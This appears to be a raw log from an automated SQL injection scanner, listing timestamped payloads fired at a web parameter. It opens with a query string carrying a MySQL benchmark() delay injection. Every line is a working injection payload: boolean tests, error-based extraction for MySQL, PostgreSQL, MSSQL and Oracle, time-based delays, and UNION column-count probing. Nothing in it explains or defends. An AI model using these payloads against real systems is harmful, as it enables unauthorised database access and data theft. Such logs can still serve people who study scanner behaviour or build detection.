str: ChannelID=None&ClassIDOne=20%3B+SELECT+benchmark%28+1000000000%2C+%27dsag%27+%29
  58 [13:32:27] [PAYLOAD] 9876
  72 [13:32:27] [PAYLOAD] 6670
  85 [13:32:27] [PAYLOAD] 1'")(")("")
  99 [13:32:28] [PAYLOAD] 1) AND 8275=1293 AND (8034=8034
 112 [13:32:28] [PAYLOAD] 1) AND 8315=8315 AND (3433=3433
 124 [13:32:28] [PAYLOAD] 1) AND 781=4337 AND (980=980
 136 [13:32:28] [PAYLOAD] 1 AND 1953=8970
 149 [13:32:28] [PAYLOAD] 1 AND 8315=8315
 161 [13:32:28] [PAYLOAD] 1 AND 4950=4940
 173 [13:32:29] [PAYLOAD] 1') AND 8079=5996 AND ('fBnH'='fBnH
 186 [13:32:29] [PAYLOAD] 1') AND 8315=8315 AND ('qJAs'='qJAs
 198 [13:32:29] [PAYLOAD] 1') AND 2732=2295 AND ('YQfq'='YQfq
 210 [13:32:29] [PAYLOAD] 1' AND 2709=3146 AND 'NCPc'='NCPc
 223 [13:32:29] [PAYLOAD] 1' AND 8315=8315 AND 'ckub'='ckub
 235 [13:32:29] [PAYLOAD] 1' AND 2146=6685 AND 'SKvx'='SKvx
 274 [13:32:30] [PAYLOAD] 1) AND (SELECT 906 FROM(SELECT COUNT(*),CONCAT(CHAR(58,113,99,105,58),(SELECT (CASE WHEN (906=906) THEN 1 ELSE 0 END)),CHAR(58,111,116,117,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND (8399=8399
 285 [13:32:30] [PAYLOAD] 1 AND (SELECT 906 FROM(SELECT COUNT(*),CONCAT(CHAR(58,113,99,105,58),(SELECT (CASE WHEN (906=906) THEN 1 ELSE 0 END)),CHAR(58,111,116,117,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
 296 [13:32:30] [PAYLOAD] 1') AND (SELECT 906 FROM(SELECT COUNT(*),CONCAT(CHAR(58,113,99,105,58),(SELECT (CASE WHEN (906=906) THEN 1 ELSE 0 END)),CHAR(58,111,116,117,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND ('FVed'='FVed
 307 [13:32:30] [PAYLOAD] 1' AND (SELECT 906 FROM(SELECT COUNT(*),CONCAT(CHAR(58,113,99,105,58),(SELECT (CASE WHEN (906=906) THEN 1 ELSE 0 END)),CHAR(58,111,116,117,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'fjiR'='fjiR
 319 [13:32:30] [PAYLOAD] 1) AND 1637=CAST(CHR(58)||CHR(113)||CHR(99)||CHR(105)||CHR(58)||(SELECT (CASE WHEN (1637=1637) THEN 1 ELSE 0 END))::text||CHR(58)||CHR(111)||CHR(116)||CHR(117)||CHR(58) AS NUMERIC) AND (2404=2404
 330 [13:32:30] [PAYLOAD] 1 AND 1637=CAST(CHR(58)||CHR(113)||CHR(99)||CHR(105)||CHR(58)||(SELECT (CASE WHEN (1637=1637) THEN 1 ELSE 0 END))::text||CHR(58)||CHR(111)||CHR(116)||CHR(117)||CHR(58) AS NUMERIC)
 341 [13:32:30] [PAYLOAD] 1') AND 1637=CAST(CHR(58)||CHR(113)||CHR(99)||CHR(105)||CHR(58)||(SELECT (CASE WHEN (1637=1637) THEN 1 ELSE 0 END))::text||CHR(58)||CHR(111)||CHR(116)||CHR(117)||CHR(58) AS NUMERIC) AND ('WjvZ'='WjvZ
 352 [13:32:30] [PAYLOAD] 1' AND 1637=CAST(CHR(58)||CHR(113)||CHR(99)||CHR(105)||CHR(58)||(SELECT (CASE WHEN (1637=1637) THEN 1 ELSE 0 END))::text||CHR(58)||CHR(111)||CHR(116)||CHR(117)||CHR(58) AS NUMERIC) AND 'BBuZ'='BBuZ
 364 [13:32:30] [PAYLOAD] 1) AND 6436=CONVERT(INT,(CHAR(58)+CHAR(113)+CHAR(99)+CHAR(105)+CHAR(58)+(SELECT (CASE WHEN (6436=6436) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(116)+CHAR(117)+CHAR(58))) AND (1525=1525
 375 [13:32:31] [PAYLOAD] 1 AND 6436=CONVERT(INT,(CHAR(58)+CHAR(113)+CHAR(99)+CHAR(105)+CHAR(58)+(SELECT (CASE WHEN (6436=6436) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(116)+CHAR(117)+CHAR(58)))
 386 [13:32:31] [PAYLOAD] 1') AND 6436=CONVERT(INT,(CHAR(58)+CHAR(113)+CHAR(99)+CHAR(105)+CHAR(58)+(SELECT (CASE WHEN (6436=6436) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(116)+CHAR(117)+CHAR(58))) AND ('ZaAQ'='ZaAQ
 397 [13:32:31] [PAYLOAD] 1' AND 6436=CONVERT(INT,(CHAR(58)+CHAR(113)+CHAR(99)+CHAR(105)+CHAR(58)+(SELECT (CASE WHEN (6436=6436) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(116)+CHAR(117)+CHAR(58))) AND 'vJYH'='vJYH
 410 [13:32:31] [PAYLOAD] 1) AND 8966=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(99)||CHR(105)||CHR(58)||(SELECT (CASE WHEN (8966=8966) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(111)||CHR(116)||CHR(117)||CHR(58)||CHR(62))) FROM DUAL) AND (2187=2187
 421 [13:32:31] [PAYLOAD] 1 AND 8966=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(99)||CHR(105)||CHR(58)||(SELECT (CASE WHEN (8966=8966) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(111)||CHR(116)||CHR(117)||CHR(58)||CHR(62))) FROM DUAL)
 432 [13:32:31] [PAYLOAD] 1') AND 8966=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(99)||CHR(105)||CHR(58)||(SELECT (CASE WHEN (8966=8966) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(111)||CHR(116)||CHR(117)||CHR(58)||CHR(62))) FROM DUAL) AND ('ipHC'='ipHC
 443 [13:32:31] [PAYLOAD] 1' AND 8966=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(99)||CHR(105)||CHR(58)||(SELECT (CASE WHEN (8966=8966) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(111)||CHR(116)||CHR(117)||CHR(58)||CHR(62))) FROM DUAL) AND 'JNdG'='JNdG
 476 [13:32:31] [PAYLOAD] 1); SELECT SLEEP(5);--  AND (673=673
 487 [13:32:31] [PAYLOAD] 1; SELECT SLEEP(5);--
 498 [13:32:32] [PAYLOAD] 1'); SELECT SLEEP(5);--  AND ('gera'='gera
 509 [13:32:32] [PAYLOAD] 1'; SELECT SLEEP(5);--  AND 'WyNs'='WyNs
 522 [13:32:32] [PAYLOAD] 1); SELECT PG_SLEEP(5);-- AND (3250=3250
 533 [13:32:32] [PAYLOAD] 1; SELECT PG_SLEEP(5);--
 544 [13:32:32] [PAYLOAD] 1'); SELECT PG_SLEEP(5);-- AND ('hCTN'='hCTN
 555 [13:32:32] [PAYLOAD] 1'; SELECT PG_SLEEP(5);-- AND 'Jdtz'='Jdtz
 569 [13:32:32] [PAYLOAD] 1); WAITFOR DELAY '0:0:5';-- AND (8785=8785
 580 [13:32:32] [PAYLOAD] 1; WAITFOR DELAY '0:0:5';--
 591 [13:32:32] [PAYLOAD] 1'); WAITFOR DELAY '0:0:5';-- AND ('aKCb'='aKCb
 602 [13:32:33] [PAYLOAD] 1'; WAITFOR DELAY '0:0:5';-- AND 'YtlZ'='YtlZ
 620 [13:32:33] [PAYLOAD] 1) AND SLEEP(5) AND (8689=8689
 631 [13:32:33] [PAYLOAD] 1 AND SLEEP(5)
 642 [13:32:33] [PAYLOAD] 1') AND SLEEP(5) AND ('hxMY'='hxMY
 653 [13:32:33] [PAYLOAD] 1' AND SLEEP(5) AND 'JgDH'='JgDH
 668 [13:32:33] [PAYLOAD] 1) AND 9550=(SELECT 9550 FROM PG_SLEEP(5)) AND (591=591
 679 [13:32:33] [PAYLOAD] 1 AND 9550=(SELECT 9550 FROM PG_SLEEP(5))
 690 [13:32:33] [PAYLOAD] 1') AND 9550=(SELECT 9550 FROM PG_SLEEP(5)) AND ('Atha'='Atha
 701 [13:32:33] [PAYLOAD] 1' AND 9550=(SELECT 9550 FROM PG_SLEEP(5)) AND 'tvZA'='tvZA
 716 [13:32:34] [PAYLOAD] 1) WAITFOR DELAY '0:0:5'-- AND (5945=5945
 727 [13:32:34] [PAYLOAD] 1 WAITFOR DELAY '0:0:5'--
 738 [13:32:34] [PAYLOAD] 1') WAITFOR DELAY '0:0:5'-- AND ('vZcs'='vZcs
 749 [13:32:34] [PAYLOAD] 1' WAITFOR DELAY '0:0:5'-- AND 'ziTu'='ziTu
 763 [13:32:34] [PAYLOAD] 1) AND 8039=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(110)||CHR(97)||CHR(107),5) AND (2374=2374
 774 [13:32:34] [PAYLOAD] 1 AND 8039=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(110)||CHR(97)||CHR(107),5)
 785 [13:32:34] [PAYLOAD] 1') AND 8039=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(110)||CHR(97)||CHR(107),5) AND ('RRIQ'='RRIQ
 796 [13:32:34] [PAYLOAD] 1' AND 8039=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(110)||CHR(97)||CHR(107),5) AND 'tOJn'='tOJn
 824 [13:32:34] [PAYLOAD] 1) UNION ALL SELECT NULL# AND (4343=4343
 835 [13:32:35] [PAYLOAD] 1) UNION ALL SELECT NULL, NULL# AND (7588=7588
 846 [13:32:35] [PAYLOAD] 1) UNION ALL SELECT NULL, NULL, NULL# AND (2592=2592
 857 [13:32:35] [PAYLOAD] 1) UNION ALL SELECT NULL, NULL, NULL, NULL# AND (4296=4296
 868 [13:32:35] [PAYLOAD] 1) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND (7652=7652
 879 [13:32:35] [PAYLOAD] 1) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND (4137=4137
 890 [13:32:35] [PAYLOAD] 1) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND (3297=3297
 901 [13:32:36] [PAYLOAD] 1) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND (4025=4025
 912 [13:32:36] [PAYLOAD] 1) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND (4351=4351
 923 [13:32:36] [PAYLOAD] 1) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND (8680=8680
 934 [13:32:36] [PAYLOAD] 1 UNION ALL SELECT NULL#
 945 [13:32:36] [PAYLOAD] 1 UNION ALL SELECT NULL, NULL#
 956 [13:32:36] [PAYLOAD] 1 UNION ALL SELECT NULL, NULL, NULL#
 967 [13:32:37] [PAYLOAD] 1 UNION ALL SELECT NULL, NULL, NULL, NULL#
 978 [13:32:37] [PAYLOAD] 1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL#
 989 [13:32:37] [PAYLOAD] 1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL#
1000 [13:32:37] [PAYLOAD] 1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL#
1011 [13:32:37] [PAYLOAD] 1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
1022 [13:32:37] [PAYLOAD] 1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
1033 [13:32:38] [PAYLOAD] 1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
1044 [13:32:38] [PAYLOAD] 1') UNION ALL SELECT NULL# AND ('kvLq'='kvLq
1055 [13:32:38] [PAYLOAD] 1') UNION ALL SELECT NULL, NULL# AND ('SrMg'='SrMg
1066 [13:32:38] [PAYLOAD] 1') UNION ALL SELECT NULL, NULL, NULL# AND ('MAlw'='MAlw
1077 [13:32:38] [PAYLOAD] 1') UNION ALL SELECT NULL, NULL, NULL, NULL# AND ('FFLQ'='FFLQ
1088 [13:32:38] [PAYLOAD] 1') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND ('gSwR'='gSwR
1099 [13:32:39] [PAYLOAD] 1') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND ('xHOQ'='xHOQ
1110 [13:32:39] [PAYLOAD] 1') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND ('tFGT'='tFGT
1121 [13:32:39] [PAYLOAD] 1') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND ('ocZd'='ocZd
1132 [13:32:39] [PAYLOAD] 1') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND ('xCVF'='xCVF
1143 [13:32:39] [PAYLOAD] 1') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND ('YQqL'='YQqL
1154 [13:32:39] [PAYLOAD] 1' UNION ALL SELECT NULL# AND 'kIzV'='kIzV
1165 [13:32:40] [PAYLOAD] 1' UNION ALL SELECT NULL, NULL# AND 'Rtqt'='Rtqt
1176 [13:32:40] [PAYLOAD] 1' UNION ALL SELECT NULL, NULL, NULL# AND 'fdev'='fdev
1187 [13:32:40] [PAYLOAD] 1' UNION ALL SELECT NULL, NULL, NULL, NULL# AND 'avgz'='avgz
1198 [13:32:40] [PAYLOAD] 1' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND 'LRFs'='LRFs
1209 [13:32:40] [PAYLOAD] 1' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# AND 'hVpW'='hVpW
1220 [13:32:40] [PAYLOAD] 1' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'LnOB'='LnOB
1231 [13:32:41] [PAYLOAD] 1' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'Oesm'='Oesm
1242 [13:32:41] [PAYLOAD] 1' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'kGHL'='kGHL
1253 [13:32:41] [PAYLOAD] 1' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'pFZn'='pFZn
1275 [13:32:41] [PAYLOAD] 1) UNION ALL SELECT NULL-- AND (3880=3880
1286 [13:32:41] [PAYLOAD] 1) UNION ALL SELECT NULL, NULL-- AND (3896=3896
1297 [13:32:41] [PAYLOAD] 1) UNION ALL SELECT NULL, NULL, NULL-- AND (5303=5303
1308 [13:32:42] [PAYLOAD] 1) UNION ALL SELECT NULL, NULL, NULL, NULL-- AND (6246=6246
1319 [13:32:42] [PAYLOAD] 1) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND (8160=8160
1330 [13:32:42] [PAYLOAD] 1) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND (8212=8212
1341 [13:32:42] [PAYLOAD] 1) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND (325=325
1352 [13:32:42] [PAYLOAD] 1) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND (8697=8697
1363 [13:32:43] [PAYLOAD] 1) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND (4867=4867
1374 [13:32:43] [PAYLOAD] 1) UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND (5564=5564
1385 [13:32:43] [PAYLOAD] 1 UNION ALL SELECT NULL--
1396 [13:32:43] [PAYLOAD] 1 UNION ALL SELECT NULL, NULL--
1407 [13:32:43] [PAYLOAD] 1 UNION ALL SELECT NULL, NULL, NULL--
1418 [13:32:43] [PAYLOAD] 1 UNION ALL SELECT NULL, NULL, NULL, NULL--
1429 [13:32:44] [PAYLOAD] 1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL--
1440 [13:32:44] [PAYLOAD] 1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL--
1451 [13:32:44] [PAYLOAD] 1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL--
1462 [13:32:44] [PAYLOAD] 1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--
1473 [13:32:44] [PAYLOAD] 1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--
1484 [13:32:44] [PAYLOAD] 1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--
1495 [13:32:45] [PAYLOAD] 1') UNION ALL SELECT NULL-- AND ('Akvo'='Akvo
1506 [13:32:45] [PAYLOAD] 1') UNION ALL SELECT NULL, NULL-- AND ('WagP'='WagP
1517 [13:32:45] [PAYLOAD] 1') UNION ALL SELECT NULL, NULL, NULL-- AND ('uqGb'='uqGb
1528 [13:32:45] [PAYLOAD] 1') UNION ALL SELECT NULL, NULL, NULL, NULL-- AND ('CDnq'='CDnq
1539 [13:32:45] [PAYLOAD] 1') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND ('itTO'='itTO
1550 [13:32:45] [PAYLOAD] 1') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND ('csUq'='csUq
1561 [13:32:46] [PAYLOAD] 1') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND ('qiVa'='qiVa
1572 [13:32:46] [PAYLOAD] 1') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND ('rZim'='rZim
1583 [13:32:46] [PAYLOAD] 1') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND ('EFZW'='EFZW
1594 [13:32:46] [PAYLOAD] 1') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND ('jtqm'='jtqm
1605 [13:32:46] [PAYLOAD] 1' UNION ALL SELECT NULL-- AND 'FPRV'='FPRV
1616 [13:32:46] [PAYLOAD] 1' UNION ALL SELECT NULL, NULL-- AND 'sONC'='sONC
1627 [13:32:47] [PAYLOAD] 1' UNION ALL SELECT NULL, NULL, NULL-- AND 'eVpk'='eVpk
1638 [13:32:47] [PAYLOAD] 1' UNION ALL SELECT NULL, NULL, NULL, NULL-- AND 'BIFa'='BIFa
1649 [13:32:47] [PAYLOAD] 1' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL-- AND 'NQAT'='NQAT
1660 [13:32:47] [PAYLOAD] 1' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND 'dkDO'='dkDO
1671 [13:32:47] [PAYLOAD] 1' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'ckxH'='ckxH
1682 [13:32:47] [PAYLOAD] 1' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'ZLQp'='ZLQp
1693 [13:32:48] [PAYLOAD] 1' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'fyJF'='fyJF
1704 [13:32:48] [PAYLOAD] 1' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'ewws'='ewws
1726 [13:32:48] [PAYLOAD] 7992
1752 [13:35:49] [PAYLOAD] 3495
1764 [13:35:49] [PAYLOAD] 0")"'''()''
1778 [13:35:49] [PAYLOAD] 0) AND 5988=6129 AND (2511=2511
1791 [13:35:49] [PAYLOAD] 0) AND 9517=9517 AND (6428=6428
1803 [13:35:49] [PAYLOAD] 0) AND 6547=4453 AND (8113=8113
1815 [13:35:49] [PAYLOAD] 0 AND 5140=7283
1828 [13:35:50] [PAYLOAD] 0 AND 9517=9517
1840 [13:35:50] [PAYLOAD] 0 AND 6859=4408
1852 [13:35:50] [PAYLOAD] 0') AND 5731=5782 AND ('hGcZ'='hGcZ
1865 [13:35:50] [PAYLOAD] 0') AND 9517=9517 AND ('Ljjl'='Ljjl
1877 [13:35:50] [PAYLOAD] 0') AND 258=6553 AND ('zMfI'='zMfI
1889 [13:35:50] [PAYLOAD] 0' AND 4643=6914 AND 'JPVG'='JPVG
1902 [13:35:51] [PAYLOAD] 0' AND 9517=9517 AND 'uPVL'='uPVL
1914 [13:35:51] [PAYLOAD] 0' AND 6938=9129 AND 'lTfB'='lTfB
1953 [13:35:51] [PAYLOAD] 0) AND (SELECT 6391 FROM(SELECT COUNT(*),CONCAT(CHAR(58,113,99,105,58),(SELECT (CASE WHEN (6391=6391) THEN 1 ELSE 0 END)),CHAR(58,111,116,117,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND (7149=7149
1964 [13:35:51] [PAYLOAD] 0 AND (SELECT 6391 FROM(SELECT COUNT(*),CONCAT(CHAR(58,113,99,105,58),(SELECT (CASE WHEN (6391=6391) THEN 1 ELSE 0 END)),CHAR(58,111,116,117,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
1975 [13:35:51] [PAYLOAD] 0') AND (SELECT 6391 FROM(SELECT COUNT(*),CONCAT(CHAR(58,113,99,105,58),(SELECT (CASE WHEN (6391=6391) THEN 1 ELSE 0 END)),CHAR(58,111,116,117,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND ('iQGU'='iQGU
1986 [13:35:51] [PAYLOAD] 0' AND (SELECT 6391 FROM(SELECT COUNT(*),CONCAT(CHAR(58,113,99,105,58),(SELECT (CASE WHEN (6391=6391) THEN 1 ELSE 0 END)),CHAR(58,111,116,117,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'FNMO'='FNMO
1998 [13:35:51] [PAYLOAD] 0) AND 2692=CAST(CHR(58)||CHR(113)||CHR(99)||CHR(105)||CHR(58)||(SELECT (CASE WHEN (2692=2692) THEN 1 ELSE 0 END))::text||CHR(58)||CHR(111)||CHR(116)||CHR(117)||CHR(58) AS NUMERIC) AND (8569=8569
2009 [13:35:52] [PAYLOAD] 0 AND 2692=CAST(CHR(58)||CHR(113)||CHR(99)||CHR(105)||CHR(58)||(SELECT (CASE WHEN (2692=2692) THEN 1 ELSE 0 END))::text||CHR(58)||CHR(111)||CHR(116)||CHR(117)||CHR(58) AS NUMERIC)
2020 [13:35:52] [PAYLOAD] 0') AND 2692=CAST(CHR(58)||CHR(113)||CHR(99)||CHR(105)||CHR(58)||(SELECT (CASE WHEN (2692=2692) THEN 1 ELSE 0 END))::text||CHR(58)||CHR(111)||CHR(116)||CHR(117)||CHR(58) AS NUMERIC) AND ('tokB'='tokB
2031 [13:35:52] [PAYLOAD] 0' AND 2692=CAST(CHR(58)||CHR(113)||CHR(99)||CHR(105)||CHR(58)||(SELECT (CASE WHEN (2692=2692) THEN 1 ELSE 0 END))::text||CHR(58)||CHR(111)||CHR(116)||CHR(117)||CHR(58) AS NUMERIC) AND 'nCrB'='nCrB
2043 [13:35:52] [PAYLOAD] 0) AND 1535=CONVERT(INT,(CHAR(58)+CHAR(113)+CHAR(99)+CHAR(105)+CHAR(58)+(SELECT (CASE WHEN (1535=1535) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(116)+CHAR(117)+CHAR(58))) AND (5309=5309
2054 [13:35:52] [PAYLOAD] 0 AND 1535=CONVERT(INT,(CHAR(58)+CHAR(113)+CHAR(99)+CHAR(105)+CHAR(58)+(SELECT (CASE WHEN (1535=1535) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(116)+CHAR(117)+CHAR(58)))
2065 [13:35:52] [PAYLOAD] 0') AND 1535=CONVERT(INT,(CHAR(58)+CHAR(113)+CHAR(99)+CHAR(105)+CHAR(58)+(SELECT (CASE WHEN (1535=1535) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(116)+CHAR(117)+CHAR(58))) AND ('GPpa'='GPpa
2076 [13:35:52] [PAYLOAD] 0' AND 1535=CONVERT(INT,(CHAR(58)+CHAR(113)+CHAR(99)+CHAR(105)+CHAR(58)+(SELECT (CASE WHEN (1535=1535) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(116)+CHAR(117)+CHAR(58))) AND 'lFbm'='lFbm
2089 [13:35:52] [PAYLOAD] 0) AND 8543=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(99)||CHR(105)||CHR(58)||(SELECT (CASE WHEN (8543=8543) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(111)||CHR(116)||CHR(117)||CHR(58)||CHR(62))) FROM DUAL) AND (283=283
2100 [13:35:52] [PAYLOAD] 0 AND 8543=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(99)||CHR(105)||CHR(58)||(SELECT (CASE WHEN (8543=8543) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(111)||CHR(116)||CHR(117)||CHR(58)||CHR(62))) FROM DUAL)
2111 [13:35:52] [PAYLOAD] 0') AND 8543=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(99)||CHR(105)||CHR(58)||(SELECT (CASE WHEN (8543=8543) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(111)||CHR(116)||CHR(117)||CHR(58)||CHR(62))) FROM DUAL) AND ('OPrO'='OPrO
2122 [13:35:53] [PAYLOAD] 0' AND 8543=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(99)||CHR(105)||CHR(58)||(SELECT (CASE WHEN (8543=8543) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(111)||CHR(116)||CHR(117)||CHR(58)||CHR(62))) FROM DUAL) AND 'USCk'='USCk
2155 [13:35:53] [PAYLOAD] 0); SELECT SLEEP(5);--  AND (1261=1261
2166 [13:35:53] [PAYLOAD] 0; SELECT SLEEP(5);--
2177 [13:35:53] [PAYLOAD] 0'); SELECT SLEEP(5);--  AND ('SwTp'='SwTp
2188 [13:35:53] [PAYLOAD] 0'; SELECT SLEEP(5);--  AND 'IJYw'='IJYw
2201 [13:35:53] [PAYLOAD] 0); SELECT PG_SLEEP(5);-- AND (3640=3640
2212 [13:35:53] [PAYLOAD] 0; SELECT PG_SLEEP(5);--
2223 [13:35:53] [PAYLOAD] 0'); SELECT PG_SLEEP(5);-- AND ('iDBt'='iDBt
2234 [13:35:53] [PAYLOAD] 0'; SELECT PG_SLEEP(5);-- AND 'jhXB'='jhXB
2248 [13:35:54] [PAYLOAD] 0); WAITFOR DELAY '0:0:5';-- AND (3737=3737
2259 [13:35:54] [PAYLOAD] 0; WAITFOR DELAY '0:0:5';--
2270 [13:35:54] [PAYLOAD] 0'); WAITFOR DELAY '0:0:5';-- AND ('yexV'='yexV
2281 [13:35:54] [PAYLOAD] 0'; WAITFOR DELAY '0:0:5';-- AND 'tovU'='tovU
2299 [13:35:54] [PAYLOAD] 0) AND SLEEP(5) AND (6911=6911
2310 [13:35:54] [PAYLOAD] 0 AND SLEEP(5)
2321 [13:35:54] [PAYLOAD] 0') AND SLEEP(5) AND ('TvZo'='TvZo
2332 [13:35:54] [PAYLOAD] 0' AND SLEEP(5) AND 'LSdJ'='LSdJ
2347 [13:35:54] [PAYLOAD] 0) AND 3289=(SELECT 3289 FROM PG_SLEEP(5)) AND (8863=8863
2358 [13:35:54] [PAYLOAD] 0 AND 3289=(SELECT 3289 FROM PG_SLEEP(5))
2369 [13:35:55] [PAYLOAD] 0') AND 3289=(SELECT 3289 FROM PG_SLEEP(5)) AND ('TZZy'='TZZy
2380 [13:35:55] [PAYLOAD] 0' AND 3289=(SELECT 3289 FROM PG_SLEEP(5)) AND 'GNNC'='GNNC
2395 [13:35:55] [PAYLOAD] 0) WAITFOR DELAY '0:0:5'-- AND (1315=1315
2406 [13:35:55] [PAYLOAD] 0 WAITFOR DELAY '0:0:5'--
2417 [13:35:55] [PAYLOAD] 0') WAITFOR DELAY '0:0:5'-- AND ('lUrK'='lUrK
2428 [13:35:55] [PAYLOAD] 0' WAITFOR DELAY '0:0:5'-- AND 'IYOh'='IYOh
2442 [13:35:55] [PAYLOAD] 0) AND 7710=DBMS_PIPE.RECEIVE_MESSAGE(CHR(86)||CHR(76)||CHR(113)||CHR(89),5) AND (2405=2405
2453 [13:35:55] [PAYLOAD] 0 AND 7710=DBMS_PIPE.RECEIVE_MESSAGE(CHR(86)||CHR(76)||CHR(113)||CHR(89),5)
2464 [13:35:55] [PAYLOAD] 0') AND 7710=DBMS_PIPE.RECEIVE_MESSAGE(CHR(86)||CHR(76)||CHR(113)||CHR(89),5) AND ('xrOV'='xrOV
2475 [13:35:56] [PAYLOAD] 0' AND 7710=DBMS_PIPE.RECEIVE_MESSAGE(CHR(86)||CHR(76)||CHR(113)||CHR(89),5) AND 'Cmrb'='Cmrb
2503 [13:35:56] [PAYLOAD] 0) UNION ALL SELECT NULL# AND (1778=1778
